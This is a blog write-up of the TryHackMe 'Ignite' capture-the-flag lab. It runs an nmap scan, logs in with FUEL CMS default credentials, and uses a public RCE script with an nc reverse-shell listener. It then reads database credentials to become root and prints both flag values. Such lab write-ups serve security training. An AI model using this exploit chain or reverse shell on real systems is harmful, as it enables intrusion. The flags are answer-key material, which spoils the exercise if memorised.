CTF Walk Through - Ignite- THM

CTF Walk Through | HackProof Academy | [email protected]


2 subscriber(s)

30/10/2024 Shad Hussain Knowledge Views 551 Comments 0 Analytics Video English DMCA Add Favorite Copy Link


Room Link : https://tryhackme.com/r/room/ignite


STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.178.241
FINDING
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/fuel/
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
--------------------------------------------------------------------------------------------------------
STEP2
http://10.10.178.241/

FINDING
To access the FUEL admin, go to:
http://10.10.178.241/fuel

User name: admin
Password: admin (you can and should change this password and admin user information after logging in)
---------------------------------------------------------------------------------------------------------
STEP3
use exploit
https://github.com/ice-wzl/Fuel-1.4.1-RCE-Updated

python3 /root/Desktop/Fuel-Updated.py http://10.10.178.241 10.17.65.196 4422
and get a revers shell on another terminal nc -nvlp 4422
FINDING
cd /
ls -la
cat flag.txt
6470e394cbf6dab6a91682cc8585059b
---------------------------------------------------------------------------------------------------------
STEP4
http://10.10.237.130/

FINDING
change the database configuration found in fuel/application/config/database.php
---------------------------------------------------------------------------------------------------------
STEP5
cd /var/www/html/fuel/application/config
ls -la
cat database.php 
FINDING
 dsn   = ,
        hostname = localhost,
        username = root,
        password = mememe,
        database = fuel_schema,
        dbdriver = mysqli,
        dbprefix = ,
---------------------------------------------------------------------------------------------------------
STEP6
su root -- with password mememe
whoami 
root
cd /root
cat root.txt
b9bbcb33e11b80be759c4e844862482d
---------------------------------------------------------------------------------------------------------

	17.11.2024 Shad Hussain Readers 155
CTF Walk Through - Lian_Yu - THM Room Link : https://tryhackme.com/r/room/lianyu STEP1 nmap -p- -sSV 10.10.9 ..... Read all...

	05.11.2024 Gauri singh Readers 251
14 WAYS TO CORRECT YOUR HUSBAND WITHOUT HURTING HIS EGO 1. LOWER YOUR VOICE Dont shout at him..He is not your child. Although sometime ..... Read all...

	08.11.2024 Shad Hussain Readers 288
CTF Walk Through - Kitty - THM Room Link : https://tryhackme.com/r/room/kitty STEP1 nmap -p- -sSV 10.10.76 ..... Read all...

	07.11.2024 Shad Hussain Readers 223
CTF Walk Through - Kenobi - THM Room Link : https://tryhackme.com/r/room/kenobi STEP1 nmap 10.10.170.101 ..... Read all...

	05.11.2024 Gauri singh Readers 283
THE BENEFITS OF LOVING SOMEONE 1. IT MAKES GOOD USE OF THE MANS ERECTION Most men wake up with an erection, i ..... Read all...

	06.11.2024 Shad Hussain Readers 449
CTF Walk Through - OverPass - THM Room Link : https://tryhackme.com/room/overpass STEP1 nmap -p- -sSV 10.10.1 ..... Read all...

	01.11.2024 Shad Hussain Readers 336
CTF Walk Through - Dav - THM Room Link : https://tryhackme.com/r/room/bsidesgtdav STEP1 nmap -p- -Pn -A ..... Read all...

	31.10.2024 Shad Hussain Readers 414
CTF Walk Through - Anonforce - THM Rom Link : https://tryhackme.com/r/room/bsidesgtanonforce STEP1 nmap -p- -P ..... Read all...

	31.10.2024 Shad Hussain Readers 453
CTF Walk Through - Thompson - THM Room link : https://tryhackme.com/r/room/bsidesgtthompson STEP1 nmap -p- -P ..... Read all...

WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)

Related articles